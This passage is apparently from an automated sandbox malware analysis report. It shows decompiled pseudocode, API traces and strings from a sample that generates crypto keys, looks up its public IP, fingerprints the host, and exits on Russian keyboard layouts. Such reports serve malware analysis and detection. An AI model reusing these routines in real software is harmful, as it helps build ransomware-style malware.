										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000); // executed
						goto L15;
					}
				}
			}

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBB82CD
VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000040), ref: 0FBB82FB
GetModuleHandleA.KERNEL32(?), ref: 0FBB834F
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBB835D
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBB836C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBB83B5
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB83C3
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBB83D7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB83E5

Strings

CryptGenRandomAdvapi32.dll, xrefs: 0FBB8367, 0FBB836A
Advapi32.dll, xrefs: 0FBB8359, 0FBB835C

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: e47e809a91679ac6c20bf6a547b297464a73c028a7086c3ac1fe89c7ff85e9c7
Instruction ID: 73cdf576489d7c319555debe4cde0208425cd092dcb2ce994ea839166ba2a878
Opcode Fuzzy Hash: e47e809a91679ac6c20bf6a547b297464a73c028a7086c3ac1fe89c7ff85e9c7
Instruction Fuzzy Hash: 5031D370A00209ABDB208FA5EC85BEEBB7CFF05711F54406DF901A6241EBB4D612CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB63E0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E0FBB63E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000); // executed
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

APIs

CryptAcquireContextW.ADVAPI32(0FBB4B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0FBB4B96,?,0FBB4B9E), ref: 0FBB63F8
GetLastError.KERNEL32(?,0FBB4B9E), ref: 0FBB6402
CryptAcquireContextW.ADVAPI32(0FBB4B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FBB4B9E), ref: 0FBB641E
CryptGenKey.ADVAPI32(0FBB4B9E,0000A400,08000001,?,?,0FBB4B9E), ref: 0FBB644A
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0FBB646E
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0FBB6486
CryptDestroyKey.ADVAPI32(?), ref: 0FBB6490
CryptReleaseContext.ADVAPI32(0FBB4B9E,00000000), ref: 0FBB649C
CryptAcquireContextW.ADVAPI32(0FBB4B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0FBB64B1

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0FBB63ED, 0FBB6413, 0FBB64A6

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: e53495227fbb1f400b11d5c68bfc870a815c36333c218bdaa53aa2b0c9e25879
Instruction ID: 580ba2b0c3025ba0c8d62679d1d3925871d736042338342b7074dcb3a41acd03
Opcode Fuzzy Hash: e53495227fbb1f400b11d5c68bfc870a815c36333c218bdaa53aa2b0c9e25879
Instruction Fuzzy Hash: CF213275B80305BBDB20CBA5ED4AFEA376DA744B11F504488FA01AB1C0D6F9A9519F60

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6FF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 0FBB7E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FBB8024
Part of subcall function 0FBB7E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FBB803D

VirtualAlloc.KERNELBASE(00000000,00002801,00003000,00000040,74CB66A0,?), ref: 0FBB700F
lstrlenW.KERNEL32(0FBBFF8C), ref: 0FBB701C

Part of subcall function 0FBB8050: InternetCloseHandle.WININET(?), ref: 0FBB8063
Part of subcall function 0FBB8050: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FBB8082

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0FBBFF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FBB704B
wsprintfW.USER32 ref: 0FBB7063
VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0FBBFF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FBB7079
InternetCloseHandle.WININET(?), ref: 0FBB7087

Strings

ipv4bot.whatismyipaddress.com, xrefs: 0FBB703C
GET, xrefs: 0FBB7024

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: 3010f25ca609b541c154a5253b5224547f0bcd24565da5f30de8be54edac99de
Instruction ID: b44fdcebf09c05760c864e45df098eba9a1a40f31719b1aa17e7400e2053b151
Opcode Fuzzy Hash: 3010f25ca609b541c154a5253b5224547f0bcd24565da5f30de8be54edac99de
Instruction Fuzzy Hash: BA015B35A412007BD6606A66AC4DFFF3A2DEBC6B12F504068F905E21C1DEE89516CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB2F50 Relevance: 10.6, APIs: 7, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0FBB2F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				void* _t20;
				WCHAR* _t23;
				int _t25;
				void* _t28;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8); // executed
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
					_t35 = _t18;
					if(_t35 != 0) {
						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
						if(_t20 == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000); // executed
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 > 0) {
								do {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
									if(_t23 == 0) {
										goto L9;
									} else {
										_t25 = lstrcmpiW( &_v2064, _v16); // executed
										if(_t25 == 0) {
											VirtualFree(_t35, 0, 0x8000);
											return 1;
										} else {
											goto L9;
										}
									}
									goto L12;
									L9:
									_t40 = _t40 + 1;
								} while (_t40 < _t31);
							}
							goto L10;
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

APIs

K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0FBB2F74
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 0FBB2F8D

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID:
API String ID: 4140748134-0
Opcode ID: c621b5e75c907428f913ec0e3059c8ee4d245d2e7935c2f65ca2a08ad183670d
Instruction ID: a5257816f5e1aabd72f51b9efed5df300eac8a8662ddede725f0ba8bc10c5160
Opcode Fuzzy Hash: c621b5e75c907428f913ec0e3059c8ee4d245d2e7935c2f65ca2a08ad183670d
Instruction Fuzzy Hash: 7B21AA32A00219BBEB219E99AC45FF977BCEB44712F1041E6FE04E7180D7B5A9159F90

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB7490 Relevance: 142.2, APIs: 55, Strings: 26, Instructions: 499
memorystringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E0FBB7490(DWORD* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t154;
				long _t155;
				WCHAR* _t157;
				short _t158;
				short _t159;
				short _t160;
				signed int _t161;
				signed int _t164;
				signed int _t166;
				int _t178;
				void* _t181;
				signed int _t183;
				signed int _t186;
				WCHAR* _t190;
				void* _t191;
				void* _t199;
				_Unknown_base(*)()* _t204;
				signed int _t211;
				intOrPtr _t216;
				WCHAR* _t218;
				WCHAR* _t220;
				void* _t221;
				void* _t224;
				WCHAR* _t226;
				long _t229;
				int _t230;
				long _t234;
				void* _t238;
				long _t240;
				long _t243;
				WCHAR* _t246;
				void* _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t252;
				void* _t256;
				DWORD* _t260;
				short* _t261;
				DWORD* _t266;
				void* _t267;
				signed int _t270;
				void* _t274;
				void* _t276;
				void* _t277;
				DWORD* _t279;
				void* _t280;
				void* _t281;

				_t267 = __edx;
				_t260 = __ecx;
				_t279 = __ecx;
				if( *__ecx != 0) {
					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 8) = _t252;
					_v24 = 0x100;
					GetUserNameW(_t252, _t260); // executed
				}
				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
					_v24 = 0x1e;
					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 0x14) = _t250;
					GetComputerNameW(_t250, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
					L11:
					if( *(_t279 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
							L31:
							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
								_push(_t260);
								 *(_t279 + 0x50) = _t220;
								_t221 = E0FBB7410(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80); // executed
								if(_t221 == 0) {
									_push(_t260);
									E0FBB7410(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
									wsprintfW( *(_t279 + 0x50), L"error");
									_t281 = _t281 + 8;
								}
							}
							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
								L44:
								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
									_v28 = 0;
									_t216 = E0FBB7B70(_t279 + 0x2c,  &_v28); // executed
									if(_t216 == 0) {
										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
									}
								}
								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x68) = _t190;
									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
									_t276 = _t191;
									GetWindowsDirectoryW(_t276, 0x100);
									_t66 = _t276 + 0x600; // 0x600
									_t266 = _t66;
									 *((short*)(_t276 + 6)) = 0;
									_t68 = _t276 + 0x400; // 0x400
									_t69 = _t276 + 0x604; // 0x604
									_t70 = _t276 + 0x608; // 0x608
									_t71 = _t276 + 0x200; // 0x200
									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
									_push(_t266);
									_t72 = _t276 + 0x60c; // 0x60c
									_t260 = _t72;
									_t199 = E0FBB7410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
									if(_t199 != 0) {
										_t73 = _t276 + 0x60c; // 0x60c
										_t211 = lstrlenW(_t73);
										_t74 = _t276 + 0x60c; // 0x60c
										_t260 = _t74;
										_push(_t260);
										E0FBB7410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
									}
									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
									_t79 = _t276 + 0x60c; // 0x60c
									_t281 = _t281 + 0xc;
									lstrcatW( *(_t279 + 0x68), _t79);
									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
									_v28 = _t204;
									if(_t204 == 0) {
										 *(_t279 + 0x6c) = 0;
									} else {
										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
									}
									 *(_t279 + 0x70) =  *(_t276 + 0x600);
									VirtualFree(_t276, 0, 0x8000); // executed
								}
								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
									L67:
									if( *(_t279 + 0x80) == 0) {
										L72:
										return 1;
									}
									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
									 *(_t279 + 0x84) = _t154;
									if(_t154 == 0) {
										L71:
										 *(_t279 + 0x80) = 0;
										goto L72;
									}
									_push(_t260);
									_t155 = E0FBB6FF0(_t154); // executed
									if(_t155 != 0) {
										goto L72;
									}
									VirtualFree( *(_t279 + 0x84), _t155, 0x8000); // executed
									goto L71;
								} else {
									_v68 = L"UNKNOWN";
									_v64 = L"NO_ROOT_DIR";
									_v60 = L"REMOVABLE";
									_v56 = L"FIXED";
									_v52 = L"REMOTE";
									_v48 = L"CDROM";
									_v44 = L"RAMDISK";
									_t157 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x7c) = _t157;
									_t261 =  &_v132;
									_t158 = 0x41;
									do {
										 *_t261 = _t158;
										_t261 = _t261 + 2;
										_t158 = _t158 + 1;
									} while (_t158 <= 0x5a);
									_t159 =  *L"?:\\"; // 0x3a003f
									_v40 = _t159;
									_t160 =  *0xfbbf350; // 0x5c
									_v36 = _t160;
									_t161 = 0;
									_v24 = 0;
									do {
										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
										_t164 = GetDriveTypeW( &_v40); // executed
										_t270 = _t164;
										if(_t270 > 2 && _t270 != 5) {
											_v36 = 0;
											lstrcatW( *(_t279 + 0x7c),  &_v40);
											_v36 = 0x5c;
											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
											lstrcatW( *(_t279 + 0x7c), "_");
											_t178 = GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16); // executed
											if(_t178 == 0) {
												lstrcatW( *(_t279 + 0x7c), L"0,");
												goto L64;
											}
											_v8 = E0FBB8AB0(_v16, 0, _v28 * _v20, 0);
											_t256 = _t267;
											_t181 = E0FBB8AB0(_v12, 0, _v28 * _v20, 0);
											_t274 = _v8;
											_v32 = _t274 - _t181;
											asm("sbb eax, edx");
											_v8 = _t256;
											_t183 = lstrlenW( *(_t279 + 0x7c));
											_push(_t256);
											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
											_t186 = lstrlenW( *(_t279 + 0x7c));
											_push(_v8);
											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
											_t281 = _t281 + 0x20;
											lstrcatW( *(_t279 + 0x7c), ",");
										}
										_t161 = _v24 + 1;
										_v24 = _t161;
									} while (_t161 < 0x1b);
									_t166 = lstrlenW( *(_t279 + 0x7c));
									_t260 =  *(_t279 + 0x7c);
									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
									goto L67;
								}
							} else {
								__imp__GetNativeSystemInfo( &_v76); // executed
								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
								_t260 = _v76 & 0x0000ffff;
								 *(_t279 + 0x5c) = _t218;
								if(_t260 > 9) {
									L42:
									_push(L"Unknown");
									L43:
									wsprintfW(_t218, ??);
									_t281 = _t281 + 8;
									goto L44;
								}
								_t260 =  *(_t260 + E0FBB7B60) & 0x000000ff;
								switch( *((intOrPtr*)(_t260 * 4 +  &M0FBB7B4C))) {
									case 0:
										_push(L"x86");
										goto L43;
									case 1:
										_push(L"ARM");
										goto L43;
									case 2:
										_push(L"Itanium");
										goto L43;
									case 3:
										_push(L"x64");
										goto L43;
									case 4:
										goto L42;
								}
							}
						}
						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
						_v8 = _t224;
						_v20 = _t224 + 0xe;
						_t226 = VirtualAlloc(0, 4, 0x3000, 4); // executed
						 *(_t279 + 0x44) = _t226;
						_t277 = 1;
						_v24 = 1;
						do {
							wsprintfW(_v8, L"%d", _t277);
							_t281 = _t281 + 0xc;
							_v16 = 0;
							_t277 = _t277 + 1;
							_t229 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12); // executed
							if(_t229 != 0) {
								L27:
								_t230 = 0;
								_v24 = 0;
								goto L28;
							}
							_v28 = 0x80;
							_t234 = RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28); // executed
							if(_t234 != 0) {
								GetLastError();
							} else {
								_v16 = 1;
							}
							RegCloseKey(_v12); // executed
							if(_v16 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v20, L"00000419") == 0) {
									_t218 = wsprintfW( *(_t279 + 0x44), "1");
									_t281 = _t281 + 8;
									ExitProcess(0);
								}
								_t230 = _v24;
							}
							L28:
						} while (_t277 != 9 && _t230 != 0);
						wsprintfW( *(_t279 + 0x44), "0");
						_t281 = _t281 + 8;
						VirtualFree(_v8, 0, 0x8000); // executed
						goto L31;
					}
					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					_v20 = _t238;
					 *(_t279 + 0x38) = _t238;
					_v12 = 0;
					_t240 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8); // executed
					if(_t240 != 0) {
						L17:
						 *(_t279 + 0x30) = 0;
						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v24 = 0x40;
					_t243 = RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24); // executed
					if(_t243 != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v8); // executed
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t279 + 0x20) = _t246;
					if(_t246 == 0) {
						goto L11;
					}
					_push(_t260);
					_t247 = E0FBB7410(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
					if(_t247 == 0) {
						wsprintfW( *(_t279 + 0x20), L"undefined");
						L10:
						_t281 = _t281 + 8;
						goto L11;
					}
					_t249 =  *(_t279 + 0x20);
					if( *_t249 != 0) {
						goto L11;
					}
					wsprintfW(_t249, L"WORKGROUP");
					goto L10;
				}
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0FBB74B7
GetUserNameW.ADVAPI32(00000000,?), ref: 0FBB74C8
VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0FBB74E6
GetComputerNameW.KERNEL32 ref: 0FBB74F0
VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBB7510
wsprintfW.USER32 ref: 0FBB7551
VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBB756E
RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBB7592
RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0FBB4810,?), ref: 0FBB75B6
GetLastError.KERNEL32 ref: 0FBB75C9
RegCloseKey.KERNELBASE(00000000), ref: 0FBB75D2
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBB75EF
VirtualAlloc.KERNELBASE(00000000,0000008A,00003000,00000004), ref: 0FBB760D
VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0FBB7623
wsprintfW.USER32 ref: 0FBB763D
RegOpenKeyExW.KERNELBASE(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0FBB765F
RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,0FBB4810,?), ref: 0FBB7681
GetLastError.KERNEL32 ref: 0FBB7694
RegCloseKey.KERNELBASE(?), ref: 0FBB769D
lstrcmpiW.KERNEL32(0FBB4810,00000419), ref: 0FBB76B1
wsprintfW.USER32 ref: 0FBB76DE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB76ED
VirtualAlloc.KERNELBASE(00000000,00000082,00003000,00000004), ref: 0FBB770D
wsprintfW.USER32 ref: 0FBB7756
GetNativeSystemInfo.KERNELBASE(?), ref: 0FBB7765
VirtualAlloc.KERNELBASE(00000000,00000040,00003000,00000004), ref: 0FBB7776
wsprintfW.USER32 ref: 0FBB779A
ExitProcess.KERNEL32 ref: 0FBB77A1
wsprintfW.USER32 ref: 0FBB77C9
VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0FBB7807
VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 0FBB781A
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0FBB7824
GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0FBB785E
lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBB7890
wsprintfW.USER32 ref: 0FBB78C8
lstrcatW.KERNEL32(?,0000060C), ref: 0FBB78DD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0FBB78E9
GetProcAddress.KERNEL32(00000000), ref: 0FBB78F0
lstrlenW.KERNEL32(?), ref: 0FBB7900
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB7931

Part of subcall function 0FBB7B70: VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0FBB7B8D
Part of subcall function 0FBB7B70: VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0FBB7C01
Part of subcall function 0FBB7B70: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FBB7C16
Part of subcall function 0FBB7B70: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB7C2C

VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0FBB7988
GetDriveTypeW.KERNELBASE(?), ref: 0FBB79CF
lstrcatW.KERNEL32(?,?), ref: 0FBB79F6
lstrcatW.KERNEL32(?,0FBC030C), ref: 0FBB7A08
lstrcatW.KERNEL32(?,0FBC0380), ref: 0FBB7A12
GetDiskFreeSpaceW.KERNELBASE(?,?,0FBB4810,?,00000000), ref: 0FBB7A28
lstrlenW.KERNEL32(?,?,00000000,0FBB4810,00000000,00000000,00000000,0FBB4810,00000000), ref: 0FBB7A70
wsprintfW.USER32 ref: 0FBB7A8A
lstrlenW.KERNEL32(?), ref: 0FBB7A98
wsprintfW.USER32 ref: 0FBB7AAC
lstrcatW.KERNEL32(?,0FBC03A0), ref: 0FBB7ABF
lstrcatW.KERNEL32(?,0FBC03A4), ref: 0FBB7ACB
lstrlenW.KERNEL32(?), ref: 0FBB7AE6
VirtualAlloc.KERNELBASE(00000000,00000081,00003000,00000004), ref: 0FBB7B09
VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 0FBB7B30

Strings

@, xrefs: 0FBB759F
Itanium, xrefs: 0FBB77B5
WORKGROUP, xrefs: 0FBB7541
ntdll.dll, xrefs: 0FBB78E4
x64, xrefs: 0FBB77A7
Unknown, xrefs: 0FBB77C3
Keyboard Layout\Preload, xrefs: 0FBB7655
Domain, xrefs: 0FBB7520
Identifier, xrefs: 0FBB78A6
LocaleName, xrefs: 0FBB75AE
00000419, xrefs: 0FBB76A9
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 0FBB7525
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0FBB771B
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 0FBB773F
RtlComputeCrc32, xrefs: 0FBB78DF
undefined, xrefs: 0FBB7549
error, xrefs: 0FBB774E
ARM, xrefs: 0FBB77AE
%I64u, xrefs: 0FBB7AA3
?:\, xrefs: 0FBB79AD
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0FBB7876, 0FBB78AB
x86, xrefs: 0FBB77BC
Control Panel\International, xrefs: 0FBB7581
productName, xrefs: 0FBB7716, 0FBB773A
ProcessorNameString, xrefs: 0FBB7871
%I64u/, xrefs: 0FBB7A84

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

